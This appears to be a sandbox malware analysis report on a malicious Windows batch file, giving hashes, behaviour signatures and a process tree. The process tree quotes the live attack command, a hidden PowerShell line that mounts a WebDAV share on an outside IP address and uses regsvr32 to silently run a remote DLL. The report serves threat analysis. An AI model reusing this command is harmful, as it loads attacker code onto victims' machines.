Analysis

  • max time kernel
    101s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    20/07/2024, 18:45 UTC

General

  • Target

    250332464164244314.bat

  • Size

    10KB

  • MD5

    ba3c099309a5f7264ebd588f9066af05

  • SHA1

    2abdb384561f35f695454487ef85a9dd8569a726

  • SHA256

    c751236e177cfa22f7cced95254cd9ecb9580d5773d9facc6780bbee89e024b4

  • SHA512

    47a68c6e66fc4ada00a274d41e3cf2e2361b33dfb48c1be77c3167e422dc5d4f5a24bc0796f94a7e8537b9700cd9e3dfd404091a418331501d8fc84b5971d3a2

  • SSDEEP

    96:dJ4FTaxO3/DoHcHt5z24panZMwECVSmEpCqLV2VBOZLYRRcgGxe682oYNTpeaQ6S:ziTrX7p5ISrcVBOZiRcuJdKYliu2Mzn7

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\250332464164244314.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:2836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\26652113928805.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2900
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\26652113928805.dll
          3⤵
            PID:1240

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2792-22-0x000000001B290000-0x000000001B572000-memory.dmp

        Filesize

        2.9MB

      • memory/2792-23-0x0000000002420000-0x0000000002428000-memory.dmp

        Filesize

        32KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.